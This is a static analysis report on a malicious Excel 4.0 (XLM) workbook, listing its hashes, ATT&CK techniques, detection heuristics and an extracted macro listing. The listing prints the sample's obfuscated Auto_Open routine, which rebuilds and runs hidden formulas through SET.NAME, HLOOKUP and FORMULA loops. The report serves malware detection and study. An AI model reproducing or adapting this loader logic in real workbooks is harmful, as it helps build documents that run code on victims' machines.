Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 75c53fe18c077cff…

MALICIOUS

Office (OLE)

Size: 36.0 KB
Created: 2020-11-25 10:42:36
Authoring application: Microsoft Excel
First seen: 2021-08-20
MD5: d7681dec2d47a7354078ae1b6ad21848
SHA-1: fafc76aed43060d6c95cfbe49d63609da1013814
SHA-256: 75c53fe18c077cff944bd047517149f0ef71b6abf15e6f9a25158aa7b272f956
Risk Score: 140

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1203 Exploitation for Client Execution

The critical heuristics indicate the presence of Excel 4.0 macros with an Auto_Open entry, a well-known method for executing malicious code. The macro sheet contains a dangerous formula API call (RUN=0), suggesting it is designed to execute a payload. No specific URLs or hashes were extracted, but the presence of Auto_Open strongly implies downloader or dropper functionality.

Heuristics (3)

  • Excel 4.0 Auto_Open defined name [critical] OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs [critical] OLE_XLM_DANGEROUS_FN
    The Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present [medium] OLE_XLM_AUTOOPEN
    The workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename        Kind        Source                                                   Size
xlm_macros.txt  xlm-macro   oletools.olevba.extract_all_macros (XLM macro listing)   6709 bytes
SHA-256: d17ec1a8dafe3e7a8beb2daf4ef845bad9956bd00a8a57c04548526a9d885b76

Script preview (first 1,000 lines of the extracted script):
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     20 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  AXIhtoKvTgq
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!C188 
' 0018     27 LABEL : Cell Value, String Constant - FbTQxHHQykdl len=0 
' 0018     22 LABEL : Cell Value, String Constant - fGDOYTo len=0 
' 0018     26 LABEL : Cell Value, String Constant - fpzGzdldDAY len=0 
' 0018     24 LABEL : Cell Value, String Constant - jhVpDdVzB len=0 
' 0018     27 LABEL : Cell Value, String Constant - jLTygsDeNDrJ len=0 
' 0018     24 LABEL : Cell Value, String Constant - KfpxRAXTE len=0 
' 0018     22 LABEL : Cell Value, String Constant - lAEAAlA len=0 
' 0018     24 LABEL : Cell Value, String Constant - lkdIwqHUH len=0 
' 0018     23 LABEL : Cell Value, String Constant - MJAOEzpM len=0 
' 0018     27 LABEL : Cell Value, String Constant - NntQmIcwQmxo len=0 
' 0018     25 LABEL : Cell Value, String Constant - nPQdsUjNNs len=0 
' 0018     25 LABEL : Cell Value, String Constant - nUlsfnhVaD len=0 
' 0018     21 LABEL : Cell Value, String Constant - pPpklw len=0 
' 0018     20 LABEL : Cell Value, String Constant - QAOVD len=0 
' 0018     27 LABEL : Cell Value, String Constant - snLfpdblixPy len=0 
' 0018     27 LABEL : Cell Value, String Constant - VgqToRBqHnwN len=0 
' 0018     27 LABEL : Cell Value, String Constant - XmbZXnMrOFtm len=0 
' 0018     21 LABEL : Cell Value, String Constant - YTCmUQ len=0 
' 0018     22 LABEL : Cell Value, String Constant - ZAiQzjB len=0 
' 0018     22 LABEL : Cell Value, String Constant - zgpYjqh len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  AXIhtoKvTgq,C96,"SET.NAME("FbTQxHHQykdl",VALUE("0"))",""
'  AXIhtoKvTgq,C101,"SET.NAME("XmbZXnMrOFtm",FbTQxHHQykdl)",""
'  AXIhtoKvTgq,C104,"SET.NAME("NntQmIcwQmxo",FbTQxHHQykdl)",""
'  AXIhtoKvTgq,C106,"SET.NAME("YTCmUQ",COUNTA(jLTygsDeNDrJ))",""
'  AXIhtoKvTgq,C110,"SET.NAME("nUlsfnhVaD",COUNTA(MJAOEzpM))",""
'  AXIhtoKvTgq,C114,[],""
'  AXIhtoKvTgq,C117,"SET.NAME("snLfpdblixPy","")",""
'  AXIhtoKvTgq,C120,"XmbZXnMrOFtm",""
'  AXIhtoKvTgq,C123,"SET.NAME("ZAiQzjB",HLOOKUP("*",jLTygsDeNDrJ,XmbZXnMrOFtm,FALSE))",""
'  AXIhtoKvTgq,C126,"fpzGzdldDAY",""
'  AXIhtoKvTgq,C128,"SET.NAME("pPpklw",FbTQxHHQykdl)",""
'  AXIhtoKvTgq,C130,[],""
'  AXIhtoKvTgq,C132,"pPpklw",""
'  AXIhtoKvTgq,C136,"VgqToRBqHnwN",""
'  AXIhtoKvTgq,C141,"lAEAAlA",""
'  AXIhtoKvTgq,C145,"zgpYjqh",""
'  AXIhtoKvTgq,C147,"SET.NAME("KfpxRAXTE",VALUE(HLOOKUP("*",MJAOEzpM,zgpYjqh,FALSE)))",""
'  AXIhtoKvTgq,C152,"lkdIwqHUH",""
'  AXIhtoKvTgq,C156,"snLfpdblixPy",""
'  AXIhtoKvTgq,C159,"NntQmIcwQmxo",""
'  AXIhtoKvTgq,C163,NEXT(),""
'  AXIhtoKvTgq,C166,"jhVpDdVzB",""
'  AXIhtoKvTgq,C169,"SET.NAME("f",INT(T(FORMULA(T(snLfpdblixPy)&"",""&T(jhVpDdVzB)))))",""
'  AXIhtoKvTgq,C174,"nPQdsUjNNs",""
'  AXIhtoKvTgq,C179,NEXT(),""
'  AXIhtoKvTgq,C184,RETURN(),""
'  AXIhtoKvTgq,C209,"SET.NAME("fGDOYTo",C96)",""
'  AXIhtoKvTgq,C214,"jLTygsDeNDrJ",""
'  AXIhtoKvTgq,C216,"SET.NAME("MJAOEzpM",R93C12)",""
'  AXIhtoKvTgq,C219,"SET.NAME("nPQdsUjNNs",226)",""
'  AXIhtoKvTgq,C223,"SET.NAME("QAOVD",3)",""
'  AXIhtoKvTgq,C225,fGDOYTo(),""
'  AXIhtoKvTgq,C226,HALT(),""